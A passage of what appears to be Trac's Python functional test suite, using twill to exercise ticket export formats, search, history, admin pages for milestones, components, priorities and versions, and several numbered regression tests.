tc.find('ticket not yet created')
class TestTicketAltFormats(FunctionalTestCaseSetup):
def runTest(self):
"""Download ticket in alternative formats"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
for format in ['Comma-delimited Text', 'Tab-delimited Text',
'RSS Feed']:
tc.follow(format)
content = b.get_html()
if content.find(summary) < 0:
raise AssertionError('Summary missing from %s format' % format)
tc.back()
class TestTicketCSVFormat(FunctionalTestCaseSetup):
def runTest(self):
"""Download ticket in CSV format"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
tc.follow('Comma-delimited Text')
csv = b.get_html()
if not csv.startswith('id,summary,'):
raise AssertionError('Bad CSV format')
class TestTicketTabFormat(FunctionalTestCaseSetup):
def runTest(self):
"""Download ticket in Tab-delimitted format"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
tc.follow('Tab-delimited Text')
tab = b.get_html()
if not tab.startswith('id\tsummary\t'):
raise AssertionError('Bad tab-delimited format')
class TestTicketRSSFormat(FunctionalTestCaseSetup):
def runTest(self):
"""Download ticket in RSS format"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
# Make a number of changes to exercise all of the RSS feed code
self._tester.go_to_ticket(ticketid)
tc.formvalue('propertyform', 'comment', random_sentence(3))
tc.formvalue('propertyform', 'field-type', 'task')
tc.formvalue('propertyform', 'description', summary + '\n\n' +
random_sentence(8))
tc.formvalue('propertyform', 'field-keywords', 'key')
tc.submit('submit')
time.sleep(1) # Have to wait a second
tc.formvalue('propertyform', 'field-keywords', '')
tc.submit('submit')
tc.find('RSS Feed')
tc.follow('RSS Feed')
rss = b.get_html()
if not rss.startswith('<?xml version="1.0"?>'):
raise AssertionError('RSS Feed not valid feed')
class TestTicketSearch(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket search"""
summary = random_sentence(4)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_front()
tc.follow('Search')
tc.formvalue('fullsearch', 'ticket', True)
tc.formvalue('fullsearch', 'q', summary)
tc.submit('Search')
tc.find('class="searchable">.*' + summary)
tc.notfind('No matches found')
class TestNonTicketSearch(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test non-ticket search"""
# Create a summary containing only unique words
summary = ' '.join([random_word() + '_TestNonTicketSearch'
for i in range(5)])
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_front()
tc.follow('Search')
tc.formvalue('fullsearch', 'ticket', False)
tc.formvalue('fullsearch', 'q', summary)
tc.submit('Search')
tc.notfind('class="searchable">' + summary)
tc.find('No matches found')
class TestTicketHistory(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket history"""
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
comment = random_sentence(5)
self._tester.add_comment(ticketid, comment=comment)
self._tester.go_to_ticket(ticketid)
url = b.get_url()
tc.go(url + '?version=0')
tc.find('at <[^>]*>*Initial Version')
tc.find(summary)
tc.notfind(comment)
tc.go(url + '?version=1')
tc.find('at <[^>]*>*Version 1')
tc.find(summary)
tc.find(comment)
class TestTicketHistoryDiff(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket history (diff)"""
name = 'TestTicketHistoryDiff'
ticketid = self._tester.create_ticket(name)
self._tester.go_to_ticket(ticketid)
tc.formvalue('propertyform', 'description', random_sentence(6))
tc.submit('submit')
tc.find('Description<[^>]*>\\s*modified \\(<[^>]*>diff', 's')
tc.follow('diff')
tc.find('Changes\\s*between\\s*<[^>]*>Initial Version<[^>]*>\\s*and' \
'\\s*<[^>]*>Version 1<[^>]*>\\s*of\\s*<[^>]*>Ticket #' , 's')
class TestTicketQueryLinks(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket query links"""
count = 3
ticket_ids = [self._tester.create_ticket(
summary='TestTicketQueryLinks%s' % i)
for i in range(count)]
self._tester.go_to_query()
# We don't have the luxury of javascript, so this is a multi-step
# process
tc.formvalue('query', 'add_filter_0', 'summary')
tc.submit('add_0')
tc.formvalue('query', '0_owner', 'nothing')
tc.submit('rm_filter_0_owner_0')
tc.formvalue('query', '0_summary', 'TestTicketQueryLinks')
tc.submit('update')
query_url = b.get_url()
for i in range(count):
tc.find('TestTicketQueryLinks%s' % i)
tc.follow('TestTicketQueryLinks0')
tc.find('class="missing">← Previous Ticket')
tc.find('title="Ticket #%s">Next Ticket' % ticket_ids[1])
tc.follow('Back to Query')
tc.url(re.escape(query_url))
tc.follow('TestTicketQueryLinks1')
tc.find('title="Ticket #%s">Previous Ticket' % ticket_ids[0])
tc.find('title="Ticket #%s">Next Ticket' % ticket_ids[2])
tc.follow('Next Ticket')
tc.find('title="Ticket #%s">Previous Ticket' % ticket_ids[1])
tc.find('class="missing">Next Ticket →')
class TestTicketQueryOrClause(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket query with an or clauses"""
count = 3
ticket_ids = [self._tester.create_ticket(
summary='TestTicketQueryOrClause%s' % i,
info={'keywords': str(i)})
for i in range(count)]
self._tester.go_to_query()
tc.formvalue('query', '0_owner', '')
tc.submit('rm_filter_0_owner_0')
tc.formvalue('query', 'add_filter_0', 'summary')
tc.submit('add_0')
tc.formvalue('query', '0_summary', 'TestTicketQueryOrClause1')
tc.formvalue('query', 'add_clause_1', 'keywords')
tc.submit('add_1')
tc.formvalue('query', '1_keywords', '2')
tc.submit('update')
tc.notfind('TestTicketQueryOrClause0')
for i in [1, 2]:
tc.find('TestTicketQueryOrClause%s' % i)
class TestTimelineTicketDetails(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test ticket details on timeline"""
env = self._testenv.get_trac_environment()
env.config.set('timeline', 'ticket_show_details', 'yes')
env.config.save()
summary = random_sentence(5)
ticketid = self._tester.create_ticket(summary)
self._tester.go_to_ticket(ticketid)
self._tester.add_comment(ticketid)
self._tester.go_to_timeline()
tc.formvalue('prefs', 'ticket_details', True)
tc.submit()
htmltags = '(<[^>]*>)*'
tc.find('Ticket ' + htmltags + '#' + str(ticketid) + htmltags + ' \\(' +
summary + '\\) updated\\s+by\\s+' + htmltags + 'admin', 's')
class TestAdminComponent(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create component"""
self._tester.create_component()
class TestAdminComponentDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate component"""
name = "DuplicateMilestone"
self._tester.create_component(name)
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.formvalue('addcomponent', 'name', name)
tc.submit()
tc.notfind(internal_error)
tc.find('Component .* already exists')
class TestAdminComponentRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove component"""
name = "RemovalComponent"
self._tester.create_component(name)
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.formvalue('component_table', 'sel', name)
tc.submit('remove')
tc.notfind(name)
class TestAdminComponentNonRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove no selected component"""
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.formvalue('component_table', 'remove', 'Remove selected items')
tc.submit('remove')
tc.find('No component selected')
class TestAdminComponentDefault(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin set default component"""
name = "DefaultComponent"
self._tester.create_component(name)
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.formvalue('component_table', 'default', name)
tc.submit('apply')
tc.find('type="radio" name="default" value="%s" checked="checked"' % \
name)
tc.go(self._tester.url + '/newticket')
tc.find('<option selected="selected" value="%s">%s</option>'
% (name, name))
class TestAdminComponentDetail(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin component detail"""
name = "DetailComponent"
self._tester.create_component(name)
component_url = self._tester.url + "/admin/ticket/components"
tc.go(component_url)
tc.follow(name)
desc = 'Some component description'
tc.formvalue('modcomp', 'description', desc)
tc.submit('cancel')
tc.url(component_url + '$')
tc.follow(name)
tc.notfind(desc)
class TestAdminMilestone(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create milestone"""
self._tester.create_milestone()
class TestAdminMilestoneSpace(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create milestone with a space"""
self._tester.create_milestone('Milestone 1')
class TestAdminMilestoneDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate milestone"""
name = "DuplicateMilestone"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.formvalue('addmilestone', 'name', name)
tc.submit()
tc.notfind(internal_error)
tc.find('Milestone %s already exists' % name)
        tc.notfind('%s')  # no unsubstituted placeholder should leak through
class TestAdminMilestoneDetail(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin modify milestone details"""
name = "DetailMilestone"
# Create a milestone
self._tester.create_milestone(name)
# Modify the details of the milestone
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.url(milestone_url + '/' + name)
tc.formvalue('modifymilestone', 'description', 'Some description.')
tc.submit('save')
tc.url(milestone_url)
# Make sure the milestone isn't closed
self._tester.go_to_roadmap()
tc.find(name)
# Cancel more modifications
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.formvalue('modifymilestone', 'description',
'~~Some other description.~~')
tc.submit('cancel')
tc.url(milestone_url)
# Verify the correct modifications show up
self._tester.go_to_roadmap()
tc.find('Some description.')
tc.follow(name)
tc.find('Some description.')
class TestAdminMilestoneDue(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin milestone duedate"""
name = "DueMilestone"
duedate = datetime.now(tz=utc)
duedate_string = format_date(duedate, tzinfo=utc)
self._tester.create_milestone(name, due=duedate_string)
tc.find(duedate_string)
class TestAdminMilestoneDetailDue(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin modify milestone duedate on detail page"""
name = "DetailDueMilestone"
# Create a milestone
self._tester.create_milestone(name)
# Modify the details of the milestone
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.url(milestone_url + '/' + name)
duedate = datetime.now(tz=utc)
duedate_string = format_date(duedate, tzinfo=utc)
tc.formvalue('modifymilestone', 'due', duedate_string)
tc.submit('save')
tc.url(milestone_url + '$')
tc.find(name + '(<[^>]*>|\\s)*'+ duedate_string, 's')
class TestAdminMilestoneCompleted(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin milestone completed"""
name = "CompletedMilestone"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.url(milestone_url + '/' + name)
tc.formvalue('modifymilestone', 'completed', True)
tc.submit('save')
tc.url(milestone_url + "$")
class TestAdminMilestoneCompletedFuture(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin milestone completed in the future"""
name = "CompletedFutureMilestone"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.url(milestone_url + '/' + name)
tc.formvalue('modifymilestone', 'completed', True)
cdate = datetime.now(tz=utc) + timedelta(days=1)
cdate_string = format_date(cdate, tzinfo=localtz)
tc.formvalue('modifymilestone', 'completeddate', cdate_string)
tc.submit('save')
tc.find('Completion date may not be in the future')
# And make sure it wasn't marked as completed.
self._tester.go_to_roadmap()
tc.find(name)
class TestAdminMilestoneRemove(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove milestone"""
name = "MilestoneRemove"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.formvalue('milestone_table', 'sel', name)
tc.submit('remove')
tc.url(milestone_url + '$')
tc.notfind(name)
class TestAdminMilestoneRemoveMulti(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove multiple milestones"""
name = "MultiRemoveMilestone"
count = 3
for i in range(count):
self._tester.create_milestone("%s%s" % (name, i))
milestone_url = self._tester.url + '/admin/ticket/milestones'
tc.go(milestone_url)
tc.url(milestone_url + '$')
for i in range(count):
tc.find("%s%s" % (name, i))
for i in range(count):
tc.formvalue('milestone_table', 'sel', "%s%s" % (name, i))
tc.submit('remove')
tc.url(milestone_url + '$')
for i in range(count):
tc.notfind("%s%s" % (name, i))
class TestAdminMilestoneNonRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove no selected milestone"""
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.formvalue('milestone_table', 'remove', 'Remove selected items')
tc.submit('remove')
tc.find('No milestone selected')
class TestAdminMilestoneDefault(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin set default milestone"""
name = "DefaultMilestone"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.formvalue('milestone_table', 'default', name)
tc.submit('apply')
tc.find('type="radio" name="default" value="%s" checked="checked"' % \
name)
# verify it is the default on the newticket page.
tc.go(self._tester.url + '/newticket')
tc.find('<option selected="selected" value="%s">%s</option>'
% (name, name))
class TestAdminPriority(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create priority"""
self._tester.create_priority()
class TestAdminPriorityDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate priority"""
name = "DuplicatePriority"
self._tester.create_priority(name)
self._tester.create_priority(name)
tc.find('Priority %s already exists' % name)
class TestAdminPriorityModify(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin modify priority"""
name = "ModifyPriority"
self._tester.create_priority(name)
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.find(name)
tc.follow(name)
tc.formvalue('modenum', 'name', name * 2)
tc.submit('save')
tc.url(priority_url + '$')
tc.find(name * 2)
class TestAdminPriorityRemove(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove priority"""
name = "RemovePriority"
self._tester.create_priority(name)
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.find(name)
tc.formvalue('enumtable', 'sel', name)
tc.submit('remove')
tc.url(priority_url + '$')
tc.notfind(name)
class TestAdminPriorityRemoveMulti(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove multiple priorities"""
name = "MultiRemovePriority"
count = 3
for i in range(count):
self._tester.create_priority("%s%s" % (name, i))
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
for i in range(count):
tc.find("%s%s" % (name, i))
for i in range(count):
tc.formvalue('enumtable', 'sel', "%s%s" % (name, i))
tc.submit('remove')
tc.url(priority_url + '$')
for i in range(count):
tc.notfind("%s%s" % (name, i))
class TestAdminPriorityNonRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove no selected priority"""
priority_url = self._tester.url + "/admin/ticket/priority"
tc.go(priority_url)
tc.formvalue('enumtable', 'remove', 'Remove selected items')
tc.submit('remove')
tc.find('No priority selected')
class TestAdminPriorityDefault(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin default priority"""
name = "DefaultPriority"
self._tester.create_priority(name)
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.find(name)
tc.formvalue('enumtable', 'default', name)
tc.submit('apply')
tc.url(priority_url + '$')
tc.find('radio.*"%s"\\schecked="checked"' % name)
class TestAdminPriorityDetail(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin modify priority details"""
name = "DetailPriority"
# Create a priority
self._tester.create_priority(name + '1')
# Modify the details of the priority
priority_url = self._tester.url + "/admin/ticket/priority"
tc.go(priority_url)
tc.url(priority_url + '$')
tc.follow(name + '1')
tc.url(priority_url + '/' + name + '1')
tc.formvalue('modenum', 'name', name + '2')
tc.submit('save')
tc.url(priority_url + '$')
# Cancel more modifications
tc.go(priority_url)
tc.follow(name)
tc.formvalue('modenum', 'name', name + '3')
tc.submit('cancel')
tc.url(priority_url + '$')
# Verify that only the correct modifications show up
tc.notfind(name + '1')
tc.find(name + '2')
tc.notfind(name + '3')
class TestAdminPriorityRenumber(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin renumber priorities"""
        # The browser is still on the priority admin page left by the
        # previous test, so read the current order numbers from that page.
        valuesRE = re.compile('<select name="value_([0-9]+)">', re.M)
        html = b.get_html()
        max_priority = max([int(x) for x in valuesRE.findall(html)])
name = "RenumberPriority"
self._tester.create_priority(name + '1')
self._tester.create_priority(name + '2')
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.find(name + '1')
tc.find(name + '2')
tc.formvalue('enumtable', 'value_%s' % (max_priority + 1), str(max_priority + 2))
tc.formvalue('enumtable', 'value_%s' % (max_priority + 2), str(max_priority + 1))
tc.submit('apply')
tc.url(priority_url + '$')
# Verify that their order has changed.
tc.find(name + '2.*' + name + '1', 's')
class TestAdminPriorityRenumberDup(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin badly renumber priorities"""
# Make the first priority the 2nd priority, and leave the 2nd priority
# as the 2nd priority.
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.formvalue('enumtable', 'value_1', '2')
tc.submit('apply')
tc.url(priority_url + '$')
tc.find('Order numbers must be unique')
class TestAdminResolution(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create resolution"""
self._tester.create_resolution()
class TestAdminResolutionDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate resolution"""
name = "DuplicateResolution"
self._tester.create_resolution(name)
self._tester.create_resolution(name)
tc.find('Resolution value "%s" already exists' % name)
class TestAdminSeverity(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create severity"""
self._tester.create_severity()
class TestAdminSeverityDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate severity"""
name = "DuplicateSeverity"
self._tester.create_severity(name)
self._tester.create_severity(name)
tc.find('Severity value "%s" already exists' % name)
class TestAdminType(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create type"""
self._tester.create_type()
class TestAdminTypeDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate type"""
name = "DuplicateType"
self._tester.create_type(name)
self._tester.create_type(name)
tc.find('Type value "%s" already exists' % name)
class TestAdminVersion(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create version"""
self._tester.create_version()
class TestAdminVersionDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate version"""
name = "DuplicateVersion"
self._tester.create_version(name)
version_admin = self._tester.url + "/admin/ticket/versions"
tc.go(version_admin)
tc.url(version_admin)
tc.formvalue('addversion', 'name', name)
tc.submit()
tc.notfind(internal_error)
tc.find("Version %s already exists." % name)
class TestAdminVersionDetail(FunctionalTwillTestCaseSetup):
# This is somewhat pointless... the only place to find the version
# description is on the version details page.
def runTest(self):
"""Admin version details"""
name = "DetailVersion"
self._tester.create_version(name)
version_admin = self._tester.url + "/admin/ticket/versions"
tc.go(version_admin)
tc.url(version_admin)
tc.follow(name)
desc = 'Some version description.'
tc.formvalue('modifyversion', 'description', desc)
tc.submit('save')
tc.url(version_admin)
tc.follow(name)
tc.find(desc)
class TestAdminVersionDetailTime(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin version detail set time"""
name = "DetailTimeVersion"
self._tester.create_version(name)
version_admin = self._tester.url + "/admin/ticket/versions"
tc.go(version_admin)
tc.url(version_admin)
tc.follow(name)
tc.formvalue('modifyversion', 'time', '')
tc.submit('save')
tc.url(version_admin + '$')
tc.find(name + '(<[^>]*>|\\s)*<[^>]* name="default" value="%s"' % name, 's')
class TestAdminVersionDetailCancel(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin version details"""
name = "DetailVersion"
self._tester.create_version(name)
version_admin = self._tester.url + "/admin/ticket/versions"
tc.go(version_admin)
tc.url(version_admin)
tc.follow(name)
desc = 'Some other version description.'
tc.formvalue('modifyversion', 'description', desc)
tc.submit('cancel')
tc.url(version_admin)
tc.follow(name)
tc.notfind(desc)
class TestAdminVersionRemove(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove version"""
name = "VersionRemove"
self._tester.create_version(name)
version_url = self._tester.url + "/admin/ticket/versions"
tc.go(version_url)
tc.formvalue('version_table', 'sel', name)
tc.submit('remove')
tc.url(version_url + '$')
tc.notfind(name)
class TestAdminVersionRemoveMulti(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove multiple versions"""
name = "MultiRemoveVersion"
count = 3
for i in range(count):
self._tester.create_version("%s%s" % (name, i))
version_url = self._tester.url + '/admin/ticket/versions'
tc.go(version_url)
tc.url(version_url + '$')
for i in range(count):
tc.find("%s%s" % (name, i))
for i in range(count):
tc.formvalue('version_table', 'sel', "%s%s" % (name, i))
tc.submit('remove')
tc.url(version_url + '$')
for i in range(count):
tc.notfind("%s%s" % (name, i))
class TestAdminVersionNonRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove no selected version"""
version_url = self._tester.url + "/admin/ticket/versions"
tc.go(version_url)
tc.formvalue('version_table', 'remove', 'Remove selected items')
tc.submit('remove')
tc.find('No version selected')
class TestAdminVersionDefault(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin set default version"""
name = "DefaultVersion"
self._tester.create_version(name)
version_url = self._tester.url + "/admin/ticket/versions"
tc.go(version_url)
tc.formvalue('version_table', 'default', name)
tc.submit('apply')
tc.find('type="radio" name="default" value="%s" checked="checked"' % \
name)
# verify it is the default on the newticket page.
tc.go(self._tester.url + '/newticket')
tc.find('<option selected="selected" value="%s">%s</option>'
% (name, name))
class TestNewReport(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Create a new report"""
self._tester.create_report(
'Closed tickets, modified in the past 7 days by owner.',
'SELECT DISTINCT p.value AS __color__,'
' id AS ticket,'
' summary, component, milestone, t.type AS type,'
' reporter, time AS created,'
' changetime AS modified, description AS _description,'
' priority,'
' round(julianday(\'now\') - '
' julianday(changetime, \'unixepoch\')) as days,'
' resolution,'
' owner as __group__'
' FROM ticket t'
' LEFT JOIN enum p ON p.name = t.priority AND '
' p.type = \'priority\''
' WHERE ((julianday(\'now\') -'
' julianday(changetime, \'unixepoch\')) < 7)'
' AND status = \'closed\''
' ORDER BY __group__, changetime, p.value',
'List of all tickets that are closed, and have been modified in'
' the past 7 days, grouped by owner.\n\n(So they have probably'
' been closed this week.)')
class RegressionTestRev5665(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create version without release time (r5665)"""
self._tester.create_version(releasetime='')
class RegressionTestRev5994(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of the column label fix in r5994"""
env = self._testenv.get_trac_environment()
env.config.set('ticket-custom', 'custfield', 'text')
env.config.set('ticket-custom', 'custfield.label', 'Custom Field')
env.config.save()
try:
self._testenv.restart()
self._tester.go_to_query()
tc.find('<label>( |\\n)*<input[^<]*value="custfield"'
'[^<]*/>( |\\n)*Custom Field( |\\n)*</label>', 's')
finally:
pass
#env.config.set('ticket', 'restrict_owner', 'no')
#env.config.save()
#self._testenv.restart()
class RegressionTestTicket4447(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/4447"""
ticketid = self._tester.create_ticket(summary="Hello World")
env = self._testenv.get_trac_environment()
env.config.set('ticket-custom', 'newfield', 'text')
env.config.set('ticket-custom', 'newfield.label',
'Another Custom Field')
env.config.save()
try:
self._testenv.restart()
self._tester.go_to_ticket(ticketid)
self._tester.add_comment(ticketid)
tc.notfind('deleted')
tc.notfind('set to')
finally:
pass
class RegressionTestTicket4630a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/4630 a"""
env = self._testenv.get_trac_environment()
env.config.set('ticket', 'restrict_owner', 'yes')
env.config.save()
try:
self._testenv.restart()
# Make sure 'user' has logged in.
self._tester.go_to_front()
self._tester.logout()
self._tester.login('user')
self._tester.logout()
self._tester.login('admin')
ticket_id = self._tester.create_ticket()
self._tester.go_to_ticket(ticket_id)
tc.formvalue('propertyform', 'action', 'reassign')
tc.find('reassign_reassign_owner')
tc.formvalue('propertyform', 'action_reassign_reassign_owner', 'user')
tc.submit('submit')
finally:
# Undo the config change for now since this (failing)
# regression test causes problems for later tests.
env.config.set('ticket', 'restrict_owner', 'no')
env.config.save()
self._testenv.restart()
class RegressionTestTicket4630b(FunctionalTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/4630 b"""
        # NOTE: this must be run after RegressionTestTicket4630a (user must
# have logged in)
from trac.perm import PermissionSystem
env = self._testenv.get_trac_environment()
perm = PermissionSystem(env)
users = perm.get_users_with_permission('TRAC_ADMIN')
self.assertEqual(users, ['admin'])
users = perm.get_users_with_permission('TICKET_MODIFY')
self.assertEqual(users, ['admin', 'user'])
class RegressionTestTicket5022(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5022
"""
summary = 'RegressionTestTicket5022'
ticket_id = self._tester.create_ticket(summary=summary)
tc.go(self._tester.url + '/newticket?id=%s' % ticket_id)
tc.notfind(summary)
class RegressionTestTicket5394a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5394 a
Order user list alphabetically in (re)assign action
"""
# set restrict_owner config
env = self._testenv.get_trac_environment()
env.config.set('ticket', 'restrict_owner', 'yes')
env.config.save()
self._testenv.restart()
self._tester.go_to_front()
self._tester.logout()
test_users = ['alice', 'bob', 'jane', 'john', 'charlie', 'alan',
'zorro']
        # Apparently it takes a second for the new user to be recognized by the
# environment. So we add all the users, then log in as the users
# in a second loop. This should be faster than adding a sleep(1)
# between the .adduser and .login steps.
for user in test_users:
self._testenv.adduser(user)
for user in test_users:
self._tester.login(user)
self._tester.logout()
self._tester.login('admin')
ticketid = self._tester.create_ticket("regression test 5394a")
self._tester.go_to_ticket(ticketid)
options = 'id="action_reassign_reassign_owner">' + \
''.join(['<option[^>]*>%s</option>' % user for user in
sorted(test_users + ['admin', 'user'])])
tc.find(options, 's')
# We don't have a good way to fully delete a user from the Trac db.
# Once we do, we may want to cleanup our list of users here.
class RegressionTestTicket5394b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5394 b
Order user list alphabetically on new ticket page
"""
# Must run after RegressionTestTicket5394a
self._tester.go_to_front()
tc.follow('New Ticket')
tc.find('Create New Ticket')
test_users = ['alice', 'bob', 'jane', 'john', 'charlie', 'alan',
'zorro']
options = 'id="field-owner"[^>]*>[[:space:]]*<option/>.*' + \
'.*'.join(['<option[^>]*>%s</option>' % user for user in
sorted(test_users + ['admin', 'user'])])
options = '.*'.join(sorted(test_users + ['admin', 'user']))
tc.find(options, 's')
# TODO: this should probably be changed to be a testsuite derived from
# TestSetup
class RegressionTestTicket5497prep(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 prep
When the component is changed, the owner should update to the
default owner of the component.
If component is changed and the owner is changed (reassigned action
for open tickets in the basic workflow), the owner should be the
specified owner, not the owner of the component.
"""
# The default owner for the component we're using for this testcase
# is 'user', and we'll manually assign to 'admin'.
self._tester.create_component('regression5497', 'user')
class RegressionTestTicket5497a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 a
Open ticket, component changed, owner not changed"""
ticketid = self._tester.create_ticket("regression test 5497a")
self._tester.go_to_ticket(ticketid)
tc.formvalue('propertyform', 'field-component', 'regression5497')
tc.submit('submit')
tc.find(regex_owned_by('user'))
class RegressionTestTicket5497b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 b
Open ticket, component changed, owner changed"""
ticketid = self._tester.create_ticket("regression test 5497b")
self._tester.go_to_ticket(ticketid)
tc.formvalue('propertyform', 'field-component', 'regression5497')
tc.formvalue('propertyform', 'action', 'reassign')
tc.formvalue('propertyform', 'action_reassign_reassign_owner', 'admin')
tc.submit('submit')
tc.notfind(regex_owned_by('user'))
tc.find(regex_owned_by('admin'))
class RegressionTestTicket5497c(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 c
New ticket, component changed, owner not changed"""
ticketid = self._tester.create_ticket("regression test 5497c",
{'component':'regression5497'})
self._tester.go_to_ticket(ticketid)
tc.find(regex_owned_by('user'))
class RegressionTestTicket5497d(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 d
New ticket, component changed, owner changed"""
ticketid = self._tester.create_ticket("regression test 5497d",
{'component':'regression5497', 'owner':'admin'})
self._tester.go_to_ticket(ticketid)
tc.find(regex_owned_by('admin'))
class RegressionTestTicket5602(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5602"""
# Create a set of tickets, and assign them all to a milestone
milestone = self._tester.create_milestone()
ids = [self._tester.create_ticket() for x in range(5)]
        for x in ids:
            self._tester.ticket_set_milestone(x, milestone)
# Need a ticket in each state: new, assigned, accepted, closed,
# reopened
# leave ids[0] as new
# make ids[1] be assigned
self._tester.go_to_ticket(ids[1])
tc.formvalue('propertyform', 'action', 'reassign')
